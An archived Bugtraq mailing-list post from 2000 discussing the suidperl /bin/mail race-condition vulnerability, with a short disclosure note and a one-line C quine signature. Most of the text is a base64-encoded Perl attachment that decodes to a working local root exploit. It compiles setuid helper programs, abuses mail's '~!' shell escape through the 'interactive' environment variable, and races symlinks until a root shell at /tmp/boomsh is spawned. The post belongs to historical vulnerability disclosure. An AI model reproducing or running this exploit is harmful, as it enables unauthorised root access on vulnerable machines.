[16118] in bugtraq
re, suidperl; more
daemon@ATHENA.MIT.EDU (Sebastian)
Mon Aug 7 15:18:35 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1502438960-227437627-965664477=:8179"
Message-Id: <Pine.LNX.3.96.1000807180351.8179A-200000@ati02.cs.uni-potsdam.de>
Date: Mon, 7 Aug 2000 18:07:57 +0200
Reply-To: Sebastian <krahmer@CS.UNI-POTSDAM.DE>
From: Sebastian <krahmer@CS.UNI-POTSDAM.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--1502438960-227437627-965664477=:8179
Content-Type: TEXT/PLAIN; charset=US-ASCII
hi,
yes, i hoped to announce this bug to the perl-developers before
it came public; but i think they read BQ ... Michal ... :)
So far, there are more security-releated apps which use /bin/mail
for logging (Once I was also fallen into thinking that it can be secure,
until Dave Dittrich pointed that my IDS might be vulnerable) such as
libsafe. Libsafe claims to be a secure strcpy() replacement. It uses
/bin/mail to report bufferoverflow-attempts with usersupplied data
if i remember correctly. The libsafe developers have been notified
month's before by me. I don't know if they fixed it yet.
Maybe the danger is visible after the perl exploit is out.
After all, it showed up again that there is no reason to be "too tricky"
in +s programs. Syslog() would have done it's task nicely i think.
regards,
Sebastian
P.S.: just to make this thing complete, i appended my version of the
exploit, which is based on Michal's but doesnt require usleep nor
a second setuid root program. should work on BSD too. However only
tested on linux.
-=[ cc -Dw=write x.c -- 172 bytes, 1 line ]=-
char s[]="char
s[]=;main(){w(1,s,9);*s=34;w(1,s,1);*s=99;w(1,s,85);*s=34;w(1,s,1);w(1,s+9,76);}";main(){w(1,s,9);*s=34;w(1,s,1);*s=99;w(1,s,85);*s=34;w(1,s,1);w(1,s+9,76);}
-=[ http://www.cs.uni-potsdam.de/homepages/students/linuxer ]=-
.
--1502438960-227437627-965664477=:8179
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="hack.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.1000807180757.8179B@ati02.cs.uni-potsdam.de>
Content-Description:
IyEvdXNyL2Jpbi9wZXJsDQoNCiMgSW4gc3ByaW5nIDIwMDAgaSBnb3QgYSBw
b2ludGVyIGZyb20gRGF2ZSBEaXR0cmljaCB0aGF0IG15IG93biBwZXJsLXNj
cmlwdA0KIyB0aGF0IGkgdXNlZCBmb3IgbXkgRW9FIElEUyB1c2VkIC9iaW4v
bWFpbCBpbiBhbiBpbnNlY3VyZSB3YXkuIEhvd2V2ZXIsDQojIERhdmUgdG9s
ZCBtZSB0aGF0IGl0IGlzIHByb3BhYmx5IG5vdCBleHBsb2l0YWJsZS4gU29t
ZSBtb250aCBsYXRlcg0KIyBpIG5vdGljZWQgdGhhdCBzdWlkcGVybCB1c2Vz
IHRoZSBzYW1lIHdheSB0byBsb2cgaW50cnVzaW9uLWF0dGVtcHRzLg0KIyBJ
IHBhdGNoZWQgcGVybC5jIHNvIHRoYXQgaSBjb3VsZCB0ZXN0IHRoZSB2dWxu
IHdpdGhvdXQgdGhlIHJhY2UuIEFmdGVyIHNvbWUNCiMgaGFyZCBuaWdodHMg
aSBmb3VuZCwgdGhhdCBpdCB3YXMgcG9zc2libGUuIFRoZSB0aGluZyB0aGF0
IG1hZGUgdGhlIGV4cGxvaXQgcG9zc2libGUNCiMgd2FzIG1haWwncyBoaWRk
ZW4gZmVhdHVyZSAnaW50ZXJhY3RpdmUnLiBJIGNvbnRhY3RlZCBzb21lIGZy
aWVuZHMgYW5kDQojIHdlIGFsbCBhZ3JlZWQgdGhhdCB0aGUgZXhwbG9pdCB3
b3VsZG4ndCBiZSB0aGUgZWFzaWVzdC4gSG93ZXZlciwgYWZ0ZXIgY29udGFj
dGluZw0KIyBNaWNoYWwgdG9vLCBoZSBzaG93ZWQgdGhhdCB3ZSBoYXZlIGJl
ZW4gd3JvbmcuIDopDQojIE1pY2hhbCB3cm90ZSB0aGUgZmlyc3QgZXhwbG9p
dCAoc2hlbGwtc2NyaXB0KSBidXQgaXQgZmFpbGVkIG9uIG15IEJTRCBib3gu
DQojIFNvIGkgcG9ydGVkIGl0IHRvIHBlcmwuIEJlbG93IHRoZSBpbml0aWFs
IGNvbW1lbnQgZnJvbSBoaXMgZXhwbG9pdDoNCg0KDQojDQojICAgIC0tIFBM
RUFTRSBSRUFEIFRIRVNFIENPTU1FTlRTIENBUkVGVUxMWSBCRUZPUkUgVFJZ
SU5HIEFOWVRISU5HIC0tDQojDQojIFdvbmRlcmZ1bCwgbG92ZWx5LCB3b3Js
ZC1zbWFzaGluZywgZXhjaXRpbmcgcGVybCBleHBsb2l0LiBJdCB3b3JrcyBh
Z2FpbnN0DQojICtzIHN1aWRwZXJsLCBleHBsb2l0aW5nIHVuZG9jdW1lbnRl
ZCAvYmluL21haWwgZmVhdHVyZSB3aGVuIHBlcmwgd2FudHMgdG8NCiMgbm90
aWZ5IHJvb3Qgb24gaW5vZGUgcmFjZSBjb25kaXRpb25zLiBDdXJyZW50bHks
IHRlc3RlZCB1bmRlciBSSCBMaW51eC4NCiMNCiMgV2hhdCdzIHByb2JhYmx5
IG1vc3Qgc2hvY2tpbmcsIGJ1Z2d5IGNvZGUgaGFzIGZvbGxvd2luZyBjb21t
ZW50IGluc2lkZToNCiMgLyogaGVoLCBoZWggKi8uIEkgZ3Vlc3MgYXV0aG9y
IHdhc24ndCBsYXVnaG5pbmcgbGFzdC4NCiMNCiMgRGV2ZWxvcG1lbnQgaGlz
dG9yeSBvZiB0aGlzIGV4cGxvaXQgaXMgcmVhbGx5IGZ1bm55LiBJIGZvdW5k
IHRoaXMgY29uZGl0aW9uDQojIGFib3V0IDQgbW9udGhzIGFnbywgYnV0IHRo
b3VnaHQgaXQncyB1c2VsZXNzICh3aG8gd2FudHMgdG8gbm90aWZ5IHJvb3Q/
KS4NCiMgSSBkZWxldGVkIG15IHRlc3QgY29kZSBhbmQgZGlkbid0IGxlZnQg
YW55IG5vdGVzIG9uIGl0LiBUaGVuLCBtb250aCBhZnRlcg0KIyB0aGlzIGRp
c2NvdmVyeSwgU2ViYXN0aWFuIGNvbnRhY3RlZCBtZS4gSGUgd2FzIHdvcmtp
bmcgb24gcGVybCBleHBsb2l0Lg0KIyBIZSB0b2xkIG1lIGhlIGRvbid0IGtu
b3cgaG93IHRvIGNhdXNlIHRoaXMgY29uZGl0aW9uIHRvIGhhcHBlbiwgYnV0
DQojIGlmIGhlIHJlYWxpc2UgaG93IGhlIGNhbiBkbyBpdCwgaGUnbGwgYmUg
YWJsZSB0byB1c2UgdW5kb2N1bWVudGVkIC9iaW4vbWFpbA0KIyBmZWF0dXJl
IC0gZW52aXJvbm1lbnRhbCB2YXJpYWJsZSAnaW50ZXJhY3RpdmUnLCB3aGlj
aCwgaWYgc2V0LCBjYXVzZXMNCiMgL2Jpbi9tYWlsIHRvIGludGVycHJldCB+
ISBjb21tYW5kcyAoc3Vic2hlbGwgcmVxdWVzdHMpIGV2ZW4gaWYgc3RkaW4g
aXMgbm90DQojIG9uIHRlcm1pbmFsLiBBbmQgdGhlbiBJIHVuZGVyc3Rvb2Qg
d2hhdCBJJ3ZlIGRvbmUuIEkgc3BlbnQgbmV4dCBtb250aA0KIyAoeWVzISBu
byBraWRkaW5nISkgdHJ5aW5nIHRvIHJlY2FsbCB3aGF0IHRoZSBmc2NrIHdh
cyB0aGUgY29uZGl0aW9uLiBJDQojIHJlbWVtYmVyZWQgaXQgd2FzIHRyaXZp
YWwsIGV2ZW4gYW5ub3lpbmcuLi4gQW5kIGZpbmFsbHksIG5vdyBJJ20gYWJs
ZSB0bw0KIyByZWNvbnN0cnVjdCBpdC4NCiMNCiMgVGhpcyBleHBsb2l0IHRy
aWVzIHRvIGZpdCBpbiByYXRoZXIgc2hvcnQsIGJ1dCByZWFzb25hYmxlIHRp
bWUgd2luZG93IGluDQojIG9yZGVyIHRvIGV4cGxvaXQgaXQuIEkgdGVzdGVk
IGl0IG9uIGZhc3QsIG5vdCBvdmVybG9hZGVkIExpbnV4IGJveCwgYW5kDQoj
IEkgZ3Vlc3Mgb24gc2xvdyBtYWNoaW5lcyBpdCBuZWVkcyB0dW5uaW5nLiBJ
dCBuZWVkcyBhbnl0aGluZyBzZXR1aWQNCiMgKC91c3IvYmluL3Bhc3N3ZCBp
cyBqdXN0IGZpbmUpLCB3cml0YWJsZSB3b3JraW5nIGRpcmVjdG9yeSBhbmQg
c29tZXRoaW5nDQojIGFyb3VuZCA0IG1pbnV0ZXMuIFdvcmtpbmcgZGlyZWN0
b3J5IHNob3VsZCBiZSBtb3VudGVkIHdpdGhvdXQgbm9leGVjIG9yDQojIG5v
c3VpZCBvcHRpb25zIChpZiBzbywgZmluZCBzb21ldGhpbmcgbGlrZSAvdmFy
L2xpYi9zdmdhbGliIGV0YykuDQojDQojIFdBUk5JTkc6IE9uIHNsb3cgbWFj
aGluZXMsIGl0J3MgcXVpdGUgcG9zc2libGUgdGhpcyBleHBsb2l0IHdpbGwg
Y2F1c2UNCiMgaGVhdnkgbG9hZC4gUGxlYXNlIHRlc3QgaXQgd2hlbiBzeXN0
ZW0gaXMgbm90IG92ZXJsb2FkZWQgYW5kIG5vdCB1c2VkDQojIChlZy4gYXQg
bmlnaHQpLg0KIw0KIw0KIyBJJ2QgbGlrZSB0byB0aGFuayBTZWJhc3RpYW4g
S3JhaG1lciBmb3IgaGlzIGhlbHAgKGluIGZhY3QsIEhFIGRpc2NvdmVyZWQg
aXQNCiMgLSBJIHRoaW5rIEkgY2FuIHNheSBpdCB3aXRob3V0IHNoYW1lKSwg
YW5kIGVzcGVjaWFsbHkgdGhhbmsgdG8gc2V2ZXJhbCBvZg0KIyBteSBicmFp
bmNlbGxzIHRoYXQgc3Vydml2ZWQgbW9uaXRvciByYWRpYXRpb24gYW5kIG1h
ZGUgbWUgcmVjYWxsIHRoaXMNCiMgcmFjZSBjb25kaXRpb24uDQojDQojIFNl
bmQgY29tbWVudHMsIGlkZWFzIGFuZCBmbGFtZXMgdG8gPGxjYW10dWZAaWRz
LnBsPg0KIyBUZXN0ZWQgd2l0aCBzcGVybCA1LjAwNTAzLCBidXQgc2hvdWxk
IHdvcmsgd2l0aCBhbnkgb3RoZXIgYXMgd2VsbC4NCiMNCiMgR29vZCBsdWNr
IGFuZCBkb24ndCBhYnVzZSBpdC4NCiMNCg0KIyBUaGUgd2FybmluZ3MgYWxz
byBhcHBseSB0byB0aGlzIHByb2dyYW0uIEZPUiBFRFVDQVRJT05BTCBQVVJQ
T1NFUyBPTkxZISEhDQojIEdyZWV0aW5ncyBhcyB1c3VhbDogWW91IGFsbCBr
bm93IHdobyB5b3UgYXJlIDopKQ0KIyBTLg0KDQpzdWIgUkVBUEVSDQp7DQoJ
d2hpbGUgKHdhaXRwaWQoLTEsIFdOT0hBTkcpID4gMCkgew0KCX0NCn0NCg0K
JFNJR3tDSExEfSA9IFwmUkVBUEVSOw0KDQpwcmludCAiXG5cblN1aWRwZXJs
IDUuMDA1MDMgKGFuZCBuZXdlcikgcm9vdCBleHBsb2l0XG4iLg0KICAgICAg
Ii0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4i
Lg0KICAgICAgIkJ1Z2Rpc2NvdmVyeSAmIEV4cGxvaXQgYnkgU2ViYXN0aWFu
IEtyYWhtZXIgPGtyYWhtZXJcQGNzLnVuaS1wb3RzZGFtLmRlPlxuIi4NCiAg
ICAgICJXaXRoIFtldmVuIGdyZWF0ZXJdIHJlc3BlY3QgdG8gTWljaGFsIFph
bGV3c2tpLCB3aG8gd3JvdGUgdGhlIGZpcnN0IGV4cGxvaXQhXG5cbiI7DQoN
CiRzdWlkcGVybCA9IGB3aGljaCBzdWlkcGVybGA7DQoNCmlmICgoc3RhdCgk
c3VpZHBlcmwpKVsyXSAmIDA0MDAwICE9IDA0MDAwKSB7DQoJcHJpbnQgIk5v
ICtzIHN1aWRwZXJsIGZvdW5kLlxuIEFib3J0aW5nLlxuIjsNCglyZXR1cm47
DQp9DQoNCnByaW50ICJZb3VyIGNob2ljZSBpcyAkc3VpZHBlcmxcbiI7DQoN
CnByaW50ICJXaGVuIHlvdSBuZWVkIHRvIHF1aXQgdGhpcyBwcm9ncmFtLCBq
dXN0IHR5cGVcbiIuDQogICAgICAiJ2tpbGxhbGwgLTkgaGFjay5wbCcgb24g
YSBzZWNvbmQgY29uc29sZS5cblxuIjsNCg0KY2hkaXIoIi90bXAiKTsNCm9w
ZW4gTywgIj5mbGFyZTEiIG9yIGRpZSAiJCEiOw0KcHJpbnQgTzw8X0VPRl87
DQojIS91c3IvYmluL3N1aWRwZXJsDQoNCnByaW50ICJJIGtub3chXG4iOw0K
X0VPRl8NCg0KY2xvc2UgTzsNCg0Kb3BlbiBPLCAiPmZsYXJlMiIgb3IgZGll
ICIkISI7DQpwcmludCBPPDxfRU9GXzsNCiMhL3Vzci9iaW4vc3VpZHBlcmwN
Cg0KcHJpbnQgIkkga25vdyEiOw0KX0VPRl8NCg0KY2xvc2UgTzsNCg0KDQpv
cGVuIE8sIj5saXR0bGVob2xlLmMiIG9yIGRpZSAiJCEiOw0KcHJpbnQgTzw8
X0VPRl87DQppbnQgbWFpbigpDQp7DQoJc2V0dWlkKDApOw0KCXNldGdpZCgw
KTsNCgljaG93bigiYm9vbXNoIiwgMCwgMCk7DQoJY2htb2QoImJvb21zaCIs
IDA2NzU1KTsNCglyZXR1cm4gMDsNCn0NCl9FT0ZfDQpjbG9zZSBPOw0KDQoN
Cm9wZW4gTywgIj5ib29tc2guYyIgb3IgZGllICIkISI7DQpwcmludCBPPDxf
RU9GXzsNCmludCBtYWluKCkNCnsNCglzZXR1aWQoMCk7DQoJc2V0Z2lkKDAp
Ow0KCXN5c3RlbSgiL2Jpbi9iYXNoIik7DQoJcmV0dXJuIDA7DQp9DQoNCl9F
T0ZfDQpjbG9zZSBPOw0KDQpjaG1vZCAwNDcwMCwgImZsYXJlMSIgb3IgZGll
ICIkISI7DQpjaG1vZCAwNDcwMCwgImZsYXJlMiIgb3IgZGllICIkISI7DQoN
CmBjYyAtbyBib29tc2ggYm9vbXNoLmNgOw0KYGNjIC1vIGxpdHRsZWhvbGUg
bGl0dGxlaG9sZS5jYDsNCg0KcHJpbnQgIk9LLiBBbGwgcHJlLXJhY2Ugc3R1
ZmYgZG9uZS4gU3RhcnRpbmcgcmFjZSAuLi5cbiIuDQogICAgICAiUGxlYXNl
IGJlIHBhdGllbnQuIEl0IGNhbiB0YWtlIHNvbWUgbWludXRlcy5cbiIuDQog
ICAgICAiWW91IGNhbiBzYWZlbHkgaWdub3JlIGVycm9yLW1lc3NhZ2VzIGxp
a2UgJ05vIHN1Y2ggZmlsZSAuLi4nXG4iOw0KDQoNCiRmaWxlbmFtZSA9ICdm
b28NCg0KfiFsaXR0bGVob2xlDQoNCic7DQoNCiRFTlZ7aW50ZXJhY3RpdmV9
PTE7DQokRU5We1BBVEh9Lj0gIjouIjsNCg0KJHAgPSAkJDsNCg0KZm9yaygp
Ow0KDQpmb3JrKCk7DQpmb3JrKCk7DQoNCiMgbWF5YmUgY29tbWVudCB0aGlz
IG91dCBpZiBib3ggaXMgc2xvdw0KZm9yaygpOw0KI2ZvcmsoKTsNCg0KIyB0
aGUgaWRlYSBpcyBzaW1wbGUgKGhleSwgaSBkb250IGtub3cgd2h5IGkgZGlk
bid0IGdvdCB0aGlzDQojIGlkZWEgYmVmb3JlIE1pY2hhbCEgOikNCiMgV2Ug
anVzdCBmb3JrIG9mZiBzb21lIHN1aWRwZXJscyB3aXRoIDIgZGlmZmVyZW50
DQojIGlucHV0ZmlsZXMuIFRoZW4gdGhlIGJydXRpbmcgY2hhbmdlIG9mIHN5
bWxpbmtzIHdpbGwNCiMgaG9wZWZ1bGx5IGhpdCBvbiBvZiB0aGUgc3VpZHBl
cmwncyByYWNlLg0KIyBjaGFuY2VzIGFyZSBnb29kLg0Kd2hpbGUgKCgoc3Rh
dCgiYm9vbXNoIikpWzJdICYgMDQwMDApICE9IDA0MDAwKSB7DQoJCXVubGlu
aygkZmlsZW5hbWUpOw0KCQlzeW1saW5rKCIvdG1wL2ZsYXJlMSIsICRmaWxl
bmFtZSk7DQoJCQ0KCQlzeXN0ZW0oIm5pY2UgLTIwIFwiJGZpbGVuYW1lXCI+
L2Rldi9udWxsICYiKTsNCgkJDQoJCXVubGluaygkZmlsZW5hbWUpOw0KCQlz
eW1saW5rKCIvdG1wL2ZsYXJlMiIsICRmaWxlbmFtZSk7DQoJCQ0KCQlzeXN0
ZW0oIm5pY2UgLTIwIFwiJGZpbGVuYW1lXCI+L2Rldi9udWxsICYiKTsNCn0N
Cg0KcHJpbnQgIk9LLiAvdG1wL2Jvb21zaCBpcyBzZXR1aWQgcm9vdCFcbiI7
DQoNCiMgdGhlIGZpcnN0IG9uZSB3aW5zIHRoZSBwcml6ZSA6KQ0KaWYgKCRw
ICE9ICQkKSB7DQoJZXhpdCgwKTsgDQp9DQoNCnN5c3RlbSgiL3RtcC9ib29t
c2giKTsNCg0K
--1502438960-227437627-965664477=:8179--
